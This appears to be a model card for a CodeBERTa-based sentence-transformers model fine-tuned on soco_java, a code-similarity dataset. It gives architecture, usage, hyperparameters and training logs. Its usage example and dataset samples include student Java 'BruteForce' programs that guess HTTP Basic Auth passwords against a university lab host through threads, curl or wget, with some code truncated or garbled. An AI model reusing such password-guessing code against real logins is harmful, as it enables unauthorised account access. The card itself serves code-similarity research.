SentenceTransformer based on huggingface/CodeBERTa-small-v1

This is a sentence-transformers model finetuned from huggingface/CodeBERTa-small-v1 on the soco_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.

Model Details

Model Description

  • Model Type: Sentence Transformer
  • Base model: huggingface/CodeBERTa-small-v1
  • Maximum Sequence Length: 512 tokens
  • Output Dimensionality: 768 dimensions
  • Similarity Function: Cosine Similarity
  • Training Dataset: soco_java

Full Model Architecture

SentenceTransformer(
  (0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel 
  (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
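
The Pooling module above has only pooling_mode_mean_tokens enabled, so the sentence vector is the average of the token vectors. The following is a minimal sketch of that idea in plain Python, assuming padding positions are marked with 0 in the attention mask; the function name mean_pool and the toy values are illustrative and are not taken from the library.

```python
from typing import List


def mean_pool(token_embeddings: List[List[float]], attention_mask: List[int]) -> List[float]:
    """Average the embeddings of non-padding tokens (mask value 1)."""
    dim = len(token_embeddings[0])
    summed = [0.0] * dim
    count = 0
    for vector, keep in zip(token_embeddings, attention_mask):
        if keep:
            count += 1
            for i, value in enumerate(vector):
                summed[i] += value
    # Guard against an all-padding input to avoid division by zero.
    count = max(count, 1)
    return [total / count for total in summed]


# Toy input: three token vectors of width 2; the last one is padding.
tokens = [[1.0, 2.0], [3.0, 4.0], [100.0, 100.0]]
mask = [1, 1, 0]
pooled = mean_pool(tokens, mask)
print(pooled)  # [2.0, 3.0]
```

In the real model each token vector has 768 dimensions and up to 512 tokens are averaged per input.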

Usage

Direct Usage (Sentence Transformers)

First install the Sentence Transformers library:

pip install -U sentence-transformers

Then you can load this model and run inference.

from sentence_transformers import SentenceTransformer

# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss")
# Run inference
sentences = [
    '\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\nclass BruteForce\n{\n\n public static void main (String a[])\n {\n \n final char [] alphabet = {\n        \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n        \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n        \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n        \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n        \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n        \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n        \'w\', \'x\', \'y\', \'z\'};\n\n String pwd="";\n \n for(int i=0;i<52;i++)\n {\n  for(int j=0;j<52;j++)\n  {\n   for(int k=0;k<52;k++)\n   {\n    pwd = alphabet[i]+""+alphabet[j]+""+alphabet[k];\n    String userPassword = ":"+pwd;\n    RealThread myTh = new RealThread(i,userPassword);\n    Thread th = new Thread( myTh );\n    th.start();\n    try\n    {\n     \n     \n     th.sleep(100);\n    }\n    catch(Exception e)\n    {} \n   }\n  }\n }\n\n\n}\n\n\n}\n\n\nclass RealThread implements Runnable\n{\n private int num;\n private URL url;\n private HttpURLConnection uc =null;\n private String userPassword;\n private int responseCode = 100;\n public RealThread (int i, String userPassword)\n {\n try\n {\n url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");\n }\n catch(Exception ex1)\n {\n }\n num = i;\n this.userPassword = userPassword;\n\n }\n \n public int getResponseCode()\n {\n\n return this.responseCode;\n }\n\n public void run()\n {\n  try\n  {\n  String encoding = new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n  uc = (HttpURLConnection)url.openConnection();\n  uc.setRequestProperty ("Authorization", " " + encoding);\n  System.out.println("Reponse  = "+uc.getResponseCode()+"for pwd = "+userPassword);\n  this.responseCode = uc.getResponseCode();\n  \n  if(uc.getResponseCode()==200)\n  {\n     System.out.println(" ======= Password Found : "+userPassword+" ========================================= ");\n     System.exit(0);\n  }\n\n  }\n  catch (Exception e) {\n  System.out.println("Could not execute Thread "+num+" ");\n  }\n }\n\n}\n',
    'import java.io.BufferedReader;\nimport java.io.FileInputStream;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.util.Date;\nimport java.util.Properties;\n\nimport javax.mail.Message;\nimport javax.mail.Session;\nimport javax.mail.Transport;\nimport javax.mail.Message.RecipientType;\nimport javax.mail.internet.InternetAddress;\nimport javax.mail.internet.MimeMessage;\n\n\n\n\npublic class Mailsend\n{\n    static final String SMTP_SERVER = MailsendPropertyHelper.getProperty("smtpServer");\n    static final String RECIPIENT_EMAIL = MailsendPropertyHelper.getProperty("recipient");\n    static final String SENDER_EMAIL = MailsendPropertyHelper.getProperty("sender");\n    static final String MESSAGE_HEADER = MailsendPropertyHelper.getProperty("messageHeader");\n\n\n\t\n\n\tpublic static void main(String args[])\n\t{\n\t\ttry\n\t\t{\n\t\t\t\n\t\t\tString smtpServer = SMTP_SERVER;\n\t\t\tString recip = RECIPIENT_EMAIL;\n\t\t\tString from = SENDER_EMAIL;\n\t\t\tString subject = MESSAGE_HEADER;\n\t\t\tString body = "Testing";\n\n\t\t\tSystem.out.println("Started sending the message");\n\t\t\tMailsend.send(smtpServer,recip , from, subject, body);\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tSystem.out.println(\n\t\t\t\t"Usage: java mailsend"\n\t\t\t\t\t+ " smtpServer toAddress fromAddress subjectText bodyText");\n\t\t}\n\n\t\tSystem.exit(0);\n\t}\n\n\n\t\n\tpublic static void send(String smtpServer, String receiver,\tString from, String subject, String body)\n\n\t{\n\t\ttry\n\t\t{\n\t\t\tProperties props = System.getProperties();\n\n\t\t\t\n\n\t\t\tprops.put("mail.smtp.host", smtpServer);\n\t\t\tprops.put("mail.smtp.timeout", "20000");\n\t\t\tprops.put("mail.smtp.connectiontimeout", "20000");\n\n\t\t\t\n\t\t\tSession session = Session.getDefaultInstance(props, null);\n\n\n\t\t\t\n\t\t\tMessage msg = new MimeMessage(session);\n\n\t\t\t\n\t\t\tmsg.setFrom(new InternetAddress(from));\n\t\t\tmsg.setRecipients(Message.RecipientType.NORMAL,\tInternetAddress.parse(receiver, false));\n\n\n\n\t\t\t\n\t\t\tmsg.setSubject(subject);\n\n\t\t\tmsg.setSentDate(new Date());\n\n\t\t\tmsg.setText(body);\n\n\t\t\t\n\t\t\tTransport.send(msg);\n\n\t\t\tSystem.out.println("sent the email with the differences : "+ + "using the mail server: "+ smtpServer);\n\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tex.printStackTrace();\n\t\t}\n\t}\n}\n',
    '\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime t = Runtime.getRuntime();\n\t  \tProcess pr= null;\n\t  \tString Fmd5,Smd5,temp1;\n\t  \tint index;\n          \n\t \ttry\n          \t{\n\t\t    \n\t\t    pr = t.exec("md5sum csfirst.html");\n\n                    InputStreamReader stre = new InputStreamReader(pr.getInputStream());\n                    BufferedReader bread = new BufferedReader(stre);\n\t\t    \n\t\t    s = bread.readLine();\n\t\t    index = s.indexOf(\' \');\n\t\t    Fmd5 = s.substring(0,index);\n\t\t    System.out.println(Fmd5);\n\t\t    \n\t\t    pr = null;\n\t\t    \n\t\t    pr = t.exec("wget http://www.cs.rmit.edu./students/");\n\t\t    pr = null;\n\t\t    \n\t\t    pr = t.exec("md5sum index.html");\n\t\t    \n\n\t\t    InputStreamReader stre1 = new InputStreamReader(pr.getInputStream());\n                    BufferedReader bread1 = new BufferedReader(stre1);\n\t\t    \n\t\t    temp1 = bread1.readLine();\n\t\t    index = temp1.indexOf(\' \');\n\t\t    Smd5 = temp1.substring(0,index);\n\t\t    System.out.println(Smd5);\n\t\t\n\t\t    pr = null;\n\t\t\n\t\t    if(Fmd5 == Smd5)\n\t\t       System.out.println("  changes Detected");\n\t\t    else\n\t\t    {\n\t\t       pr = t.exec("diff csfirst.html index.html > report.html");\n\t\t       pr = null;\n\t\t       \n\t\t       try{\n\t\t       Thread.sleep(10000);\n\t\t       }catch(Exception e){}\n\t\t       \n\t\t       pr = t.exec(" Message.txt | mutt -s Chnages  Webpage -a report.html -x @yallara.cs.rmit.edu.");\n\t\t     \n\t\t       \n\t\t       \n\t\t    }   \n\t\t    \n    \t        }catch(java.io.IOException e){}\n\t}\n}\t\t\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]

# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
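
Since the card lists cosine similarity as the similarity function, the 3 x 3 matrix printed above should hold pairwise cosine scores. The sketch below shows that computation on toy 2-dimensional vectors in plain Python; the helper names cosine_similarity and similarity_matrix are illustrative and the values are not model outputs.

```python
import math
from typing import List


def cosine_similarity(a: List[float], b: List[float]) -> float:
    """Cosine of the angle between two vectors; 0.0 if either has zero length."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0.0 or norm_b == 0.0:
        return 0.0
    return dot / (norm_a * norm_b)


def similarity_matrix(vectors: List[List[float]]) -> List[List[float]]:
    """Pairwise cosine similarity of every vector with every other vector."""
    return [[cosine_similarity(u, v) for v in vectors] for u in vectors]


# Toy stand-ins for three embeddings (the real ones have 768 dimensions).
toy_embeddings = [[1.0, 0.0], [0.0, 2.0], [3.0, 3.0]]
matrix = similarity_matrix(toy_embeddings)
for row in matrix:
    print([round(score, 3) for score in row])
```

The matrix is symmetric with values close to 1 on the diagonal, so for pairwise code comparison only the entries above the diagonal need to be inspected.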

Training Details

Training Dataset

soco_java

  • Dataset: soco_java at c8fab14
  • Size: 30,069 training samples
  • Columns: label, text_1, and text_2
  • Approximate statistics based on the first 1000 samples:
    • label (int): 0: ~99.70%, 1: ~0.30%
    • text_1 (string): min 51 tokens, mean 450.65 tokens, max 512 tokens
    • text_2 (string): min 51 tokens, mean 468.5 tokens, max 512 tokens
  • Samples:
    label text_1 text_2
    0




    import java.io.*;
    import java.net.*;
    import java.Runtime;
    import java.util.*;
    import java.net.smtp.SmtpClient;



    public class WatchDog

    {

    static String strImageOutputFile01 = "WebPageImages01.txt";
    static String strImageOutputFile02 = "WebPageImages02.txt";

    static String strWebPageOutputFile01 = "WebPageOutput01.txt";
    static String strWebPageOutputFile02 = "WebPageOutput02.txt";

    static String strWatchDogDiffFile_01_02 = "WatchDogDiff_01_02.txt";

    static String strFromEmailDefault = "@.rmit.edu.";
    static String strToEmailDefault = "@.rmit.edu.";

    static String strFromEmail = null;
    static String strToEmail = null;




    public static void main (String args[])

    {







    URL url = null;
    HttpURLConnection urlConnection;
    int intContentLength;
    String strWebPageText = "";

    String strURL = "http://www.cs.rmit.edu./students/";
    String strPrePend = "...
    import java.io.*;
    import java.net.*;
    import java.util.*;

    public class Watchdog
    {
    public static void main(String args[])
    {

    String mainLink="http://www.cs.rmit.edu./students/";
    String sender = "@cs.rmit.edu.";
    String recipient = "";
    String hostName = "yallara.cs.rmit.edu.";
    int delay = 86400000;

    try
    {
    int imgSrcIndex, imgSrcEnd;
    String imgLink;
    Vector imageList = new Vector();
    HttpURLConnection imgConnection;
    URL imgURL;


    EmailClient email = new EmailClient(sender, recipient, hostName);


    URL url=new URL(mainLink);
    HttpURLConnection connection = (HttpURLConnection) url.openConnection();

    BufferedReader webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));


    FileWriter fwrite = new FileWriter("local.txt");
    BufferedWriter writefile = new BufferedWriter(fwrite);

    String line=webpage.readLine();

    while (line != null)
    {

    writefile.write(line,0,line.length());
    wri...
    0
    import java.util.*;
    import java.io.*;
    import java.*;

    public class Dogs5
    {
    public static void main(String [] args) throws Exception
    {
    executes("rm index.*");
    executes("wget http://www.cs.rmit.edu./students");

    while (true)
    {
    String addr= "wget http://www.cs.rmit.edu./students";
    executes(addr);
    String hash1 = md5sum("index.html");
    String hash2 = md5sum("index.html.1");
    System.out.println(hash1 +"
    "+ hash2);

    BufferedReader buf = new BufferedReader(new FileReader("/home/k//Assign2/ulist1.txt"));

    String line=" " ;
    String line1=" " ;
    String line2=" ";
    String line3=" ";
    String[] cad = new String[10];

    executes("./.sh");

    int i=0;
    while ((line = buf.readLine()) != null)
    {

    line1="http://www.cs.rmit.edu./students/images"+line;
    if (i==1)
    line2="http://www.cs.rmi...
    0

    import java.util.*;
    import java.text.*;
    import java.io.*;
    import java.*;
    import java.net.*;

    public class WatchDog
    {
    public static void main(String args[])
    {
    String s = null;
    String webpage = "http://www.cs.rmit.edu./students/";


    String file1 = "file1";
    String file2 = "file2";

    try
    {
    Process p = Runtime.getRuntime().exec("wget -O " + file1 + " " + webpage);

    BufferedReader stdInput = new BufferedReader(new
    InputStreamReader(p.getInputStream()));

    BufferedReader stdError = new BufferedReader(new
    InputStreamReader(p.getErrorStream()));


    while ((s = stdInput.readLine()) != null) {
    System.out.println(s);
    }


    while ((s = stdError.readLine()) != null) {
    System.out.println(s);
    }

    try
    {
    p.waitFor();
    }
    catch...


    import java.io.*;
    import java.net.*;
    import java.util.*;
    import java.String;
    import java.Object;
    import java.awt.*;



    public class WatchDog
    {
    private URL url;
    private URLConnection urlcon;
    private int lastModifiedSince = 0;
    private int lastModified[] = new int[2];

    private int count = 0;

    public static String oldFile;
    public static String newFile;

    private String diffFile;

    private BufferedWriter bw;
    private Process p;
    private Runtime r;
    private String fileName;



    private ArrayList old[]= new ArrayList[500];
    private ArrayList news[] = new ArrayList[500];
    private String info = "";
    private int index = 0;

    public WatchDog(String fileName)
    {
    this.fileName = fileName;
    oldFile = fileName + ".old";
    newFile = fileName + ".new";
    diffFile = "testFile.txt";
    }
    public static void main(String args[])
    {
    WatchDog wd = new WatchDog("TestDog");

    wd.detectChange(WatchDog.oldFile);
    while (true)
    {
    try
    {
    Thread.slee...
  • Loss: SoftmaxLoss
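
As a rough illustration of the loss named above: SoftmaxLoss, as described in the Sentence-BERT paper cited at the end of this card, concatenates the two embeddings u and v with their element-wise difference |u - v|, feeds the result to a linear classifier, and applies cross-entropy against the label. The sketch below reproduces that computation in plain Python on toy 2-dimensional vectors. The classifier weights are hypothetical zeros chosen so the result is easy to check; the trained classifier weights are not part of this card.

```python
import math
from typing import List


def build_features(u: List[float], v: List[float]) -> List[float]:
    """Concatenate (u, v, |u - v|) into one classifier input vector."""
    return u + v + [abs(a - b) for a, b in zip(u, v)]


def softmax(logits: List[float]) -> List[float]:
    """Numerically stable softmax."""
    peak = max(logits)
    exps = [math.exp(x - peak) for x in logits]
    total = sum(exps)
    return [e / total for e in exps]


def softmax_loss(u, v, weights, bias, label: int) -> float:
    """Cross-entropy of a linear classifier applied to (u, v, |u - v|)."""
    features = build_features(u, v)
    logits = [sum(w * f for w, f in zip(row, features)) + b
              for row, b in zip(weights, bias)]
    return -math.log(softmax(logits)[label])


# Toy embeddings of width 2, so the feature vector has 3 * 2 = 6 entries.
u = [1.0, 0.0]
v = [0.0, 1.0]
weights = [[0.0] * 6, [0.0] * 6]  # hypothetical: one row per label (0 and 1)
bias = [0.0, 0.0]
loss = softmax_loss(u, v, weights, bias, label=0)
print(round(loss, 4))  # 0.6931, i.e. ln(2) for an untrained two-class head
```

With this model's 768-dimensional embeddings the classifier input would have 3 x 768 = 2304 entries.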

Evaluation Dataset

soco_java

  • Dataset: soco_java at c8fab14
  • Size: 3,342 evaluation samples
  • Columns: label, text_1, and text_2
  • Approximate statistics based on the first 1000 samples:
    • label (int): 0: ~99.40%, 1: ~0.60%
    • text_1 (string): min 51 tokens, mean 443.11 tokens, max 512 tokens
    • text_2 (string): min 51 tokens, mean 467.05 tokens, max 512 tokens
  • Samples:
    label text_1 text_2
    0

    import java.Runtime;
    import java.io.*;

    public class differenceFile
    {
    StringWriter sw =null;
    PrintWriter pw = null;
    public differenceFile()
    {
    sw = new StringWriter();
    pw = new PrintWriter();
    }
    public String compareFile()
    {
    try
    {
    Process = Runtime.getRuntime().exec("diff History.txt Comparison.txt");

    InputStream write = sw.getInputStream();
    BufferedReader bf = new BufferedReader (new InputStreamReader(write));
    String line;
    while((line = bf.readLine())!=null)
    pw.println(line);
    if((sw.toString().trim()).equals(""))
    {
    System.out.println(" difference");
    return null;
    }
    System.out.println(sw.toString().trim());
    }catch(Exception e){}
    return sw.toString().trim();
    }
    }







    import java.*;
    import java.io.*;
    import java.util.*;

    public class BruteForce
    {

    public static void main(String[] args)
    {
    Runtime rt = Runtime.getRuntime();
    Process pr= null;
    char chars[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};
    String pass;
    char temp[] = {'a','a'};
    char temp1[] = {'a','a','a'};
    char temp2[] = {'a'};

    String f= new String();
    String resp = new String();
    int count=0;
    String success = new String();
    InputStreamReader instre;
    BufferedReader bufread;


    for(int k=0;k<52;k++)
    {
    temp2[0]=chars[k];
    pass = new String(temp2);
    count++;

    System.out.println("The password tried ...
    0
    import java.io.*;
    import java.net.*;
    import java.util.*;

    public class Watchdog
    {
    public static void main(String args[])
    {

    String mainLink="http://www.cs.rmit.edu./students/";
    String sender = "@cs.rmit.edu.";
    String recipient = "";
    String hostName = "yallara.cs.rmit.edu.";
    int delay = 86400000;

    try
    {
    int imgSrcIndex, imgSrcEnd;
    String imgLink;
    Vector imageList = new Vector();
    HttpURLConnection imgConnection;
    URL imgURL;


    EmailClient email = new EmailClient(sender, recipient, hostName);


    URL url=new URL(mainLink);
    HttpURLConnection connection = (HttpURLConnection) url.openConnection();

    BufferedReader webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));


    FileWriter fwrite = new FileWriter("local.txt");
    BufferedWriter writefile = new BufferedWriter(fwrite);

    String line=webpage.readLine();

    while (line != null)
    {

    writefile.write(line,0,line.length());
    wri...


    import java.net.*;
    import java.io.*;
    import java.String;
    import java.*;
    import java.util.*;

    public class BruteForce {
    private static final int passwdLength = 3;
    private static String commandLine
    = "curl http://sec-crack.cs.rmit.edu./SEC/2/index.php -I -u :";
    private String chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    private int charLen = chars.length();
    private int n = 0;
    private int n3 = charLen*charLen*charLen;
    private String response;
    private String[] password = new String[charLen*charLen*charLen+charLen*charLen+charLen];
    private char[][] data = new char[passwdLength][charLen];
    private char[] pwdChar2 = new char[2];
    private char[] pwdChar = new char[passwdLength];
    private String url;
    private int startTime;
    private int endTime;
    private int totalTime;
    private float averageTime;
    private boolean finish;
    private Process curl;
    private BufferedReader bf, responseLine;

    ...
    0
    import java.io.*;
    import java.awt.*;
    import java.net.*;

    public class BruteForce
    {
    public static void main (String[] args)
    {
    String pw = new String();
    pw = getPassword ();
    System.out.println("Password is: "+pw);
    }
    public static String getPassword()
    {
    String passWord = new String();
    passWord = "AAA";
    char[] guess = passWord.toCharArray();
    Process pro = null;
    Runtime runtime = Runtime.getRuntime();
    BufferedReader in = null;
    String str=null;
    boolean found = true;

    System.out.println(" attacking.....");
    for (int i=65;i<=122 ;i++ )
    {
    guess[0]=(char)(i);
    for (int j=65;j<=122 ;j++ )
    {
    guess[1]=(char)(j);
    for (int k=65 ;k<=122 ;k++ )
    {
    guess[2]=(char)(k);
    passWord = new String(guess);
    String cmd = "wget --http-user= --http-passwd="+passWord +" http://sec-crack.cs.rmit.edu./SEC/2/index.php ";
    try
    {
    pro = runtime.exec(cmd);

    in = new BufferedReader(new InputStreamReader(pro.getErrorSt...


    import java.io.*;
    import java.text.*;
    import java.util.*;
    import java.net.*;

    public class BruteForce extends Thread
    {
    private static final String USERNAME = "";
    private static final char [] POSSIBLE_CHAR =
    {'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
    'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
    'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
    'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'};
    private static int NUMBER_OF_THREAD = 500;

    private static Date startDate = null;
    private static Date endDate = null;

    private String address;
    private String password;

    public BruteForce(String address, String password)
    {
    this.address = address;
    this.password = password;
    }

    public static void main(String[] args) throws IOException
    {
    if (args.length < 1)
    {
    System.err.println("Invalid usage!");
    System.err.println("...
  • Loss: SoftmaxLoss
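
The label statistics for both splits are heavily skewed toward label 0. The short calculation below makes that concrete. It assumes the shares measured on the first 1000 samples hold for each full split, which the card does not confirm, so the counts are rough estimates only.

```python
def estimated_positives(total_samples: int, positive_share: float) -> int:
    """Estimate the number of label-1 pairs from a sampled share."""
    return round(total_samples * positive_share)


def majority_baseline_accuracy(positive_share: float) -> float:
    """Accuracy of a classifier that always predicts label 0."""
    return 1.0 - positive_share


# Split sizes and label shares as reported in this card.
train_positives = estimated_positives(30069, 0.0030)
eval_positives = estimated_positives(3342, 0.0060)

print(train_positives)  # 90
print(eval_positives)   # 20
print(f"{majority_baseline_accuracy(0.0060):.1%}")  # 99.4%
```

Because always predicting label 0 would already score about 99.4% accuracy on the evaluation split under this assumption, precision and recall on label 1 are likely to be more informative than accuracy.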

Training Hyperparameters

Non-Default Hyperparameters

  • eval_strategy: steps
  • per_device_train_batch_size: 16
  • per_device_eval_batch_size: 16
  • learning_rate: 2e-05
  • num_train_epochs: 1
  • warmup_ratio: 0.1
  • fp16: True
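
To show how these settings interact, the sketch below computes the learning rate over the run with a linear schedule (the lr_scheduler_type listed under All Hyperparameters) and 10% warmup. It assumes training on a single device with no gradient accumulation, so that 30,069 samples at batch size 16 give 1,880 optimizer steps; this matches the training logs, where step 100 corresponds to epoch 0.0532. The function name is illustrative.

```python
import math


def linear_schedule_lr(step: int, base_lr: float, total_steps: int, warmup_steps: int) -> float:
    """Linear warmup from 0 to base_lr, then linear decay back to 0."""
    if step < warmup_steps:
        return base_lr * step / max(1, warmup_steps)
    remaining = max(0, total_steps - step)
    return base_lr * remaining / max(1, total_steps - warmup_steps)


train_samples = 30069   # training set size from this card
batch_size = 16         # per_device_train_batch_size (single device assumed)
epochs = 1              # num_train_epochs
base_lr = 2e-05         # learning_rate
warmup_ratio = 0.1      # warmup_ratio

total_steps = math.ceil(train_samples / batch_size) * epochs
warmup_steps = math.ceil(total_steps * warmup_ratio)
print(total_steps, warmup_steps)  # 1880 188

for step in (0, 94, 188, 1034, 1880):
    print(step, linear_schedule_lr(step, base_lr, total_steps, warmup_steps))
```

Under these assumptions the learning rate peaks at 2e-05 at step 188 and reaches zero at step 1880.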

All Hyperparameters

  • overwrite_output_dir: False
  • do_predict: False
  • eval_strategy: steps
  • prediction_loss_only: True
  • per_device_train_batch_size: 16
  • per_device_eval_batch_size: 16
  • per_gpu_train_batch_size: None
  • per_gpu_eval_batch_size: None
  • gradient_accumulation_steps: 1
  • eval_accumulation_steps: None
  • torch_empty_cache_steps: None
  • learning_rate: 2e-05
  • weight_decay: 0.0
  • adam_beta1: 0.9
  • adam_beta2: 0.999
  • adam_epsilon: 1e-08
  • max_grad_norm: 1.0
  • num_train_epochs: 1
  • max_steps: -1
  • lr_scheduler_type: linear
  • lr_scheduler_kwargs: {}
  • warmup_ratio: 0.1
  • warmup_steps: 0
  • log_level: passive
  • log_level_replica: warning
  • log_on_each_node: True
  • logging_nan_inf_filter: True
  • save_safetensors: True
  • save_on_each_node: False
  • save_only_model: False
  • restore_callback_states_from_checkpoint: False
  • no_cuda: False
  • use_cpu: False
  • use_mps_device: False
  • seed: 42
  • data_seed: None
  • jit_mode_eval: False
  • use_ipex: False
  • bf16: False
  • fp16: True
  • fp16_opt_level: O1
  • half_precision_backend: auto
  • bf16_full_eval: False
  • fp16_full_eval: False
  • tf32: None
  • local_rank: 0
  • ddp_backend: None
  • tpu_num_cores: None
  • tpu_metrics_debug: False
  • debug: []
  • dataloader_drop_last: False
  • dataloader_num_workers: 0
  • dataloader_prefetch_factor: None
  • past_index: -1
  • disable_tqdm: False
  • remove_unused_columns: True
  • label_names: None
  • load_best_model_at_end: False
  • ignore_data_skip: False
  • fsdp: []
  • fsdp_min_num_params: 0
  • fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
  • fsdp_transformer_layer_cls_to_wrap: None
  • accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
  • deepspeed: None
  • label_smoothing_factor: 0.0
  • optim: adamw_torch
  • optim_args: None
  • adafactor: False
  • group_by_length: False
  • length_column_name: length
  • ddp_find_unused_parameters: None
  • ddp_bucket_cap_mb: None
  • ddp_broadcast_buffers: False
  • dataloader_pin_memory: True
  • dataloader_persistent_workers: False
  • skip_memory_metrics: True
  • use_legacy_prediction_loop: False
  • push_to_hub: False
  • resume_from_checkpoint: None
  • hub_model_id: None
  • hub_strategy: every_save
  • hub_private_repo: None
  • hub_always_push: False
  • gradient_checkpointing: False
  • gradient_checkpointing_kwargs: None
  • include_inputs_for_metrics: False
  • include_for_metrics: []
  • eval_do_concat_batches: True
  • fp16_backend: auto
  • push_to_hub_model_id: None
  • push_to_hub_organization: None
  • mp_parameters:
  • auto_find_batch_size: False
  • full_determinism: False
  • torchdynamo: None
  • ray_scope: last
  • ddp_timeout: 1800
  • torch_compile: False
  • torch_compile_backend: None
  • torch_compile_mode: None
  • include_tokens_per_second: False
  • include_num_input_tokens_seen: False
  • neftune_noise_alpha: None
  • optim_target_modules: None
  • batch_eval_metrics: False
  • eval_on_start: False
  • use_liger_kernel: False
  • eval_use_gather_object: False
  • average_tokens_across_devices: False
  • prompts: None
  • batch_sampler: batch_sampler
  • multi_dataset_batch_sampler: proportional

Training Logs

Epoch    Step   Training Loss   Validation Loss
0.0532   100    0.2015          0.0240
0.1064   200    0.0143          0.0209
0.1596   300    0.0241          0.0241
0.2128   400    0.0174          0.0213
0.2660   500    0.0228          0.0206
0.3191   600    0.0061          0.0226
0.3723   700    0.0194          0.0208
0.4255   800    0.0193          0.0197
0.4787   900    0.0261          0.0175
0.5319   1000   0.0189          0.0178
0.5851   1100   0.0089          0.0188
0.6383   1200   0.0174          0.0161
0.6915   1300   0.0171          0.0162
0.7447   1400   0.0149          0.0155
0.7979   1500   0.011           0.0164
0.8511   1600   0.0308          0.0160
0.9043   1700   0.0048          0.0167
0.9574   1800   0.0142          0.0164
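
For readers who want to inspect the logs programmatically, the sketch below copies the rows above into a list and finds the step with the lowest validation loss. It only summarizes the logged numbers; the card does not state which checkpoint was published, and load_best_model_at_end is False, so this should not be read as the released checkpoint.

```python
# (step, training loss, validation loss) copied from the Training Logs table.
logs = [
    (100, 0.2015, 0.0240), (200, 0.0143, 0.0209), (300, 0.0241, 0.0241),
    (400, 0.0174, 0.0213), (500, 0.0228, 0.0206), (600, 0.0061, 0.0226),
    (700, 0.0194, 0.0208), (800, 0.0193, 0.0197), (900, 0.0261, 0.0175),
    (1000, 0.0189, 0.0178), (1100, 0.0089, 0.0188), (1200, 0.0174, 0.0161),
    (1300, 0.0171, 0.0162), (1400, 0.0149, 0.0155), (1500, 0.011, 0.0164),
    (1600, 0.0308, 0.0160), (1700, 0.0048, 0.0167), (1800, 0.0142, 0.0164),
]

# Row with the smallest validation loss.
best_step, best_train_loss, best_val_loss = min(logs, key=lambda row: row[2])
print(best_step, best_val_loss)  # 1400 0.0155

# Validation loss at the first and last logged evaluation.
first_val, last_val = logs[0][2], logs[-1][2]
print(first_val, last_val)  # 0.024 0.0164
```

The validation loss falls from 0.0240 at step 100 to 0.0164 at step 1800, with the lowest logged value of 0.0155 at step 1400.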

Framework Versions

  • Python: 3.11.13
  • Sentence Transformers: 4.1.0
  • Transformers: 4.52.4
  • PyTorch: 2.6.0+cu124
  • Accelerate: 1.7.0
  • Datasets: 3.6.0
  • Tokenizers: 0.21.1

Citation

BibTeX

Sentence Transformers and SoftmaxLoss

@inproceedings{reimers-2019-sentence-bert,
    title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
    author = "Reimers, Nils and Gurevych, Iryna",
    booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
    month = "11",
    year = "2019",
    publisher = "Association for Computational Linguistics",
    url = "https://arxiv.org/abs/1908.10084",
}